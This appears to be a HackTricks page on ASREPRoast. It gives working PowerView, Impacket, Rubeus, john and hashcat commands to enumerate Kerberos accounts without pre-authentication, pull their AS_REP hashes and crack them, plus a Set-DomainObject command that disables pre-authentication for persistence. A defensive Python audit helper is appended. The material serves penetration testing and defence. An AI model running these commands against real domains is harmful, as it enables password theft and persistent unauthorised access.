HackTricks
ASREPRoast

The ASREPRoast attack looks for users that do not have Kerberos pre-authentication required, i.e. accounts with the DONT_REQ_PREAUTH flag set.
That means that anyone can send an AS_REQ to the DC on behalf of any of those users and receive an AS_REP message. This message contains a chunk of data encrypted with the user's key, which is derived from the user's password. With this message in hand, the password can be cracked offline.
Furthermore, no domain account is needed to perform this attack, only a connection to the DC. However, with a domain account, an LDAP query can be used to retrieve the users in the domain that do not require Kerberos pre-authentication. Otherwise, usernames have to be guessed.

Enumerating vulnerable users (domain credentials needed)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Request AS_REP message

Using Linux
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Using Windows
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

Cracking

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Persistence

Force "preauth not required" on a user over which you have GenericAll (or write-property) permissions:
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
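The following audit helper is an added example, not code from HackTricks, PowerView or Impacket; it covers both the LDAP query mentioned in the introduction and the userAccountControl value used in the persistence command, building the bitwise LDAP filter for DONT_REQ_PREAUTH, flagging exposed enabled accounts in a constructed sample, and showing why remediation should clear the bit with AND-NOT rather than the -XOR toggle. The OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule; the sample accounts are made up.

```python
# Audit/remediation helper for the DONT_REQ_PREAUTH flag (added example,
# not HackTricks', PowerView's or Impacket's code).

DONT_REQ_PREAUTH = 0x400000   # 4194304: Kerberos pre-authentication not required
ACCOUNTDISABLE = 0x0002       # a disabled account cannot be ASREPRoasted
NORMAL_ACCOUNT = 0x0200
BIT_AND_RULE = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND

# Constructed sample in the shape of an LDAP search result; not real data.
SAMPLE_USERS = [
    {"sAMAccountName": "triceratops", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "VPN114user", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old-svc", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "svc-backup", "userAccountControl": 0x10200 | DONT_REQ_PREAUTH},
]


def ldap_filter():
    """Filter that returns every user object with the DONT_REQ_PREAUTH bit set."""
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{BIT_AND_RULE}:={DONT_REQ_PREAUTH}))")


def preauth_not_required(uac):
    """True when the account does not require Kerberos pre-authentication."""
    return bool(uac & DONT_REQ_PREAUTH)


def audit(users, include_disabled=False):
    """Names of accounts exposed to ASREPRoast; disabled ones are skipped by default."""
    return [u["sAMAccountName"] for u in users
            if preauth_not_required(u["userAccountControl"])
            and (include_disabled or not u["userAccountControl"] & ACCOUNTDISABLE)]


def clear_preauth_flag(uac):
    """Idempotent fix: AND-NOT clears the bit whether or not it was set."""
    return uac & ~DONT_REQ_PREAUTH


def toggle_preauth_flag(uac):
    """What Set-DomainObject -XOR does: flips the bit, so applying it to an
    account that already has the flag set re-enables pre-authentication."""
    return uac ^ DONT_REQ_PREAUTH


if __name__ == "__main__":
    print(ldap_filter())
    for name in audit(SAMPLE_USERS):
        print("preauth not required:", name)
```

Run against the sample it lists VPN114user and svc-backup; feed real entries from an LDAP search using ldap_filter() to audit a domain.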